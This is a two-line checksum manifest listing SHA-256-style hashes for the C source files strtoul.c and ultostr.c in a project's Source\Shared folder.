 c0dd0e6d2f4b23a97b6cabb9822b87adb6ae8723ee3e65831809e549b7efcb9a *Source\Shared\strtoul.c
 9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Shared\ultostr.c